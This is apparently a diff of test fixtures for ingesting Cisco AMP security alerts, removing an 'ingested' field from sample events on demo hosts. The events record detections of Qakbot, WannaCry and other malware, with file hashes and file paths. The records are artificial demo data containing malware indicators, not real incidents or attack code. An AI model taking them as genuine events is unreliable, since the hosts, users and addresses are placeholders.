@@ -947,7 +936,6 @@ ], "code": "1107296274", "id": "1492784107692000800", - "ingested": "2022-02-02T05:53:29.530510988Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "severity": 4, @@ -1027,7 +1015,6 @@ ], "code": "1107296278", "id": "1458626002840536600", - "ingested": "2022-02-02T05:53:29.530512171Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 
@@ -1092,7 +1079,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583861114428195000", - "ingested": "2022-02-02T05:53:29.530513274Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -1156,7 +1142,6 @@ ], "code": "553648173", "id": "6264747552596296000", - "ingested": "2022-02-02T05:53:29.530514327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "severity": 0 
@@ -1244,7 +1229,6 @@ ], "code": "1090519054", "id": "6411444887895409000", - "ingested": "2022-02-02T05:53:29.530515364Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "severity": 2 
@@ -1341,7 +1325,6 @@ ], "code": "553648143", "id": "6411444887895409000", - "ingested": "2022-02-02T05:53:29.530516517Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "severity": 2 
@@ -1417,7 +1400,6 @@ ], "code": "2164260880", "id": "6419187549993959000", - "ingested": "2022-02-02T05:53:29.530517505Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1495,7 +1477,6 @@ ], "code": "1090519054", "id": "6419187549993959000", - "ingested": "2022-02-02T05:53:29.530518494Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 
@@ -1594,7 +1575,6 @@ ], "code": "1090519054", "id": "6419187537109058000", - "ingested": "2022-02-02T05:53:29.530519601Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 
@@ -1691,7 +1671,6 @@ ], "code": "553648143", "id": "6419187537109058000", - "ingested": "2022-02-02T05:53:29.530520694Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -1755,7 +1734,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583853374897127000", - "ingested": "2022-02-02T05:53:29.530521789Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -1823,7 +1801,6 @@ ], "code": "1107296272", "id": "14945825043963", - "ingested": "2022-02-02T05:53:29.530522784Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 3, 
@@ -1905,7 +1882,6 @@ ], "code": "1107296258", "id": "14945825043964", - "ingested": "2022-02-02T05:53:29.530523978Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 3, 
@@ -1983,7 +1959,6 @@ ], "code": "553648155", "id": "6533671599780921000", - "ingested": "2022-02-02T05:53:29.530524975Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "severity": 3 
@@ -2057,7 +2032,6 @@ ], "code": "553648147", "id": "6533671595485954000", - "ingested": "2022-02-02T05:53:29.530525975Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "severity": 3 
@@ -2143,7 +2117,6 @@ ], "code": "2164260880", "id": "6419179222052372000", - "ingested": "2022-02-02T05:53:29.530526989Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2217,7 +2190,6 @@ ], "code": "1090519054", "id": "6419179222052372000", - "ingested": "2022-02-02T05:53:29.530528009Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
